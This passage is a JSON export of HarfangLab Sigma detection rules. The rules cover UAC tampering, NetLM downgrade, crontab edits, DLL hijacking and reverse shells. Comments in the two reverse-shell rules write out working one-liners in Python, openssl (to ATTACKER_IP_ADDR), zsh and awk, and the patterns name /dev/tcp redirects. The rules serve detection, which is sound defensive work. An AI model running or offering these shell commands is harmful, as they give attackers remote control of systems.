"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b08e300-2cbf-4b7f-8b71-d33804657613",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622461Z",
"creation_date": "2026-03-23T11:45:34.622463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622467Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration",
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1548_uac_consent_config_change.yml",
"content": "title: UAC Registry Configuration Modified\nid: 2b08e300-2cbf-4b7f-8b71-d33804657613\ndescription: |\n Detects a partial disabling of the UAC consent window in the User Account Control registry configuration.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate this action to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://attack.mitre.org/techniques/T1548/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n filter_disable:\n Details:\n - 'DWORD (0x00000000)' # This is handled by the rule 189eeb83-5aec-4186-97ea-ad22929a4f15\n - 'DWORD (0x00000005)' # This is the default value\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_clickshare:\n ProcessCommandLine|endswith: '\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\ClickShareButtonApp-{????????-????-????-????-????????????}.exe'\n # C:\\Windows\\System32\\DriverStore\\FileRepository\\barcoclicksharedrv.inf_amd64_2911b58ce63436e2\\BarcoClickShareSvc.exe\n ProcessGrandparentImage: '?:\\Windows\\System32\\DriverStore\\FileRepository\\barcoclicksharedrv.inf_*\\BarcoClickShareSvc.exe'\n Details: 'DWORD (0x00000002)'\n\n # c6d36742ebd7db317f2740a67c37ec08608f85ecdfa093315823cc37c5cc7d06\n exclusion_clickshare_2:\n ProcessImage: '?:\\ClickShareApp\\ClickShare\\app-?.??.?-???\\clickshare_native.exe'\n\n exclusion_vaudio:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\VAudio\\Audckq32.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n Details: 'DWORD (0x00000004)'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b08e300-2cbf-4b7f-8b71-d33804657613",
"rule_name": "UAC Registry Configuration Modified",
"rule_description": "Detects a partial disabling of the UAC consent window in the User Account Control registry configuration.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate this action to determine its legitimacy.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b0a3397-e688-4bb7-ae09-07debeea1a9d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089034Z",
"creation_date": "2026-03-23T11:45:34.089036Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089040Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1595/002/"
],
"name": "t1595_002_linux_exp_suggester_perl.yml",
"content": "title: Linux-Exploit-Suggester Hacktool Executed via Perl\nid: 2b0a3397-e688-4bb7-ae09-07debeea1a9d\ndescription: |\n Detects common commands from linux-exploit-suggester-2.\n linux-exploit-suggester is an open-source Perl script for suggesting privilege escalation exploits on Linux.\n It is recommended to investigate the context of this execution to determine if this is a legitimate action conducted by an administrator to test his systems or if it is part of an attack.\n If so, it is recommended to block the user and isolate the machine for further forensics.\nreferences:\n - https://attack.mitre.org/techniques/T1595/002/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Perl\n - classification.Linux.HackTool.LinuxExploitSuggester\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentImage|endswith: '/perl'\n CommandLine: 'sh -c uname -r |cut -d\"-\" -f1'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b0a3397-e688-4bb7-ae09-07debeea1a9d",
"rule_name": "Linux-Exploit-Suggester Hacktool Executed via Perl",
"rule_description": "Detects common commands from linux-exploit-suggester-2.\nlinux-exploit-suggester is an open-source Perl script for suggesting privilege escalation exploits on Linux.\nIt is recommended to investigate the context of this execution to determine if this is a legitimate action conducted by an administrator to test his systems or if it is part of an attack.\nIf so, it is recommended to block the user and isolate the machine for further forensics.\n",
"rule_creation_date": "2022-11-21",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [],
"rule_technique_tags": [
"attack.t1595.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b16b989-2088-48a9-a2e4-ff125b31a00e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621402Z",
"creation_date": "2026-03-23T11:45:34.621404Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621408Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level",
"www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_001_netlm_downgrade.yml",
"content": "title: NetLM Downgraded\nid: 2b16b989-2088-48a9-a2e4-ff125b31a00e\ndescription: |\n Detects the downgrade of the NetLM configuration in the Windows registry.\n The modification of the LmCompatibilityLevel registry value to 2 or less disables the use of NTLMv2 session security.\n This weakens the security of network authentication and can be used by attackers to extract the NTLM hash.\n It is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\nreferences:\n - https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level\n - www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2020/11/09\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel'\n Details:\n - 'DWORD (0x00000000)'\n - 'DWORD (0x00000001)'\n - 'DWORD (0x00000002)'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - 
'?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains: '|?:\\MININT\\Tools\\X64\\TsManager.exe|?:\\MININT\\Tools\\X64\\TsmBootstrap.exe|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b16b989-2088-48a9-a2e4-ff125b31a00e",
"rule_name": "NetLM Downgraded",
"rule_description": "Detects the downgrade of the NetLM configuration in the Windows registry.\nThe modification of the LmCompatibilityLevel registry value to 2 or less disables the use of NTLMv2 session security.\nThis weakens the security of network authentication and can be used by attackers to extract the NTLM hash.\nIt is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\n",
"rule_creation_date": "2020-11-09",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b26abb8-6656-496d-8bdf-d47537666c04",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093694Z",
"creation_date": "2026-03-23T11:45:34.093696Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093700Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_edit_macos.yml",
"content": "title: Cron Jobs Edited via Crontab (macOS)\nid: 2b26abb8-6656-496d-8bdf-d47537666c04\ndescription: |\n Detects the execution of the crontab command to edit cron jobs.\n An attacker could use crontab to add a malicious cron job for persistence.\n It is recommended to check the content of the file in command-line for any unwanted lines.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/crontab'\n CommandLine|contains: ' -e'\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b26abb8-6656-496d-8bdf-d47537666c04",
"rule_name": "Cron Jobs Edited via Crontab (macOS)",
"rule_description": "Detects the execution of the crontab command to edit cron jobs.\nAn attacker could use crontab to add a malicious cron job for persistence.\nIt is recommended to check the content of the file in command-line for any unwanted lines.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-30",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592619Z",
"creation_date": "2026-03-23T11:45:34.592625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592638Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpinput.yml",
"content": "title: DLL Hijacking via rdpinput.exe\nid: 2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1\ndescription: |\n Detects potential Windows DLL Hijacking via rdpinput.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpinput.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\winsta.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1",
"rule_name": "DLL Hijacking via rdpinput.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpinput.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2b5b655e-f7bb-4864-9202-ad7b2087ae12",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095413Z",
"creation_date": "2026-03-23T11:45:34.095415Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095419Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/006/"
],
"name": "t1059_006_reverse_shell_python_macos.yml",
"content": "title: Reverse Shell Executed via Python (macOS)\nid: 2b5b655e-f7bb-4864-9202-ad7b2087ae12\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Python.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/11/14\nmodified: 2025/01/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # export RHOST=\"127.0.0.1\";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n selection_command:\n CommandLine|contains|all:\n - 'import'\n - 'socket'\n - '.socket('\n - '.connect('\n - 'os.dup2('\n - 'fileno()'\n\n selection_shell:\n CommandLine|contains:\n - '.spawn('\n - '.call('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2b5b655e-f7bb-4864-9202-ad7b2087ae12",
"rule_name": "Reverse Shell Executed via Python (macOS)",
"rule_description": "Detects a suspicious command line related to a reverse shell execution via Python.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bade688-d13f-4317-9d07-3994ff35201f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623552Z",
"creation_date": "2026-03-23T11:45:34.623554Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623559Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hacktricks.wiki/en/generic-hacking/reverse-shells/linux.html",
"https://www.revshells.com/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1059_004_reverse_shell_command_line_linux.yml",
"content": "title: Reverse Shell Execution from Command-line\nid: 2bade688-d13f-4317-9d07-3994ff35201f\ndescription: |\n Detects different suspicious usages of the shell that are related to reverse shells.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate the process tree for suspicious activities.\nreferences:\n - https://hacktricks.wiki/en/generic-hacking/reverse-shells/linux.html\n - https://www.revshells.com/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2022/07/01\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.RemoteShell\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_command:\n CommandLine|contains:\n - 'http://reverse-shell.sh/'\n - 'https://reverse-shell.sh/'\n - 'sh -i*>*/dev/tcp/*'\n - 'sh -i*>*/dev/udp/*'\n - 'exec *<>*/dev/tcp/*'\n - 'exec *<>*/dev/udp/*'\n - 'sh*0>*/dev/tcp/'\n - 'sh*0>*/dev/udp/'\n - 'sh -i <&3 >&3 2>&3'\n # openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :\n - 's_client*-connect*:*|*sh*|*s_client*-connect*:*'\n # mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP_ADDR:443 > /tmp/s; rm /tmp/s\n - '2>&1*openssl*s_client'\n # zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\n - 'zmodload zsh/net/tcp * ztcp'\n\n # awk 'BEGIN {s = \"/inet/tcp/0//\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n selection_awk_protocol:\n CommandLine|contains:\n - 
'/inet/tcp/'\n - '/inet/udp/'\n selection_awk_command:\n CommandLine|contains|all:\n - 'BEGIN '\n - 'printf'\n - 'getline '\n - 'close('\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1/'\n - '/dev/tcp/localhost/'\n - '/dev/udp/127.0.0.1/'\n - '/dev/udp/localhost/'\n\n exclusion_commandline:\n CommandLine|contains:\n - '/dev/tcp/$HOST/$PORT'\n - '/dev/tcp/${host}/${port}'\n\n exclusion_containerd:\n - ParentImage:\n - '/bin/runc'\n - '/bin/containerd-shim-runc-v2'\n - '/usr/bin/containerd-shim-runc-v2'\n - Ancestors|contains:\n - '|/bin/runc|'\n - '|/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n condition: (selection_command or all of selection_awk_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bade688-d13f-4317-9d07-3994ff35201f",
"rule_name": "Reverse Shell Execution from Command-line",
"rule_description": "Detects different suspicious usages of the shell that are related to reverse shells.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate the process tree for suspicious activities.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2026-03-17",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bb34ffc-2356-4191-b774-bc4fc82ee828",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
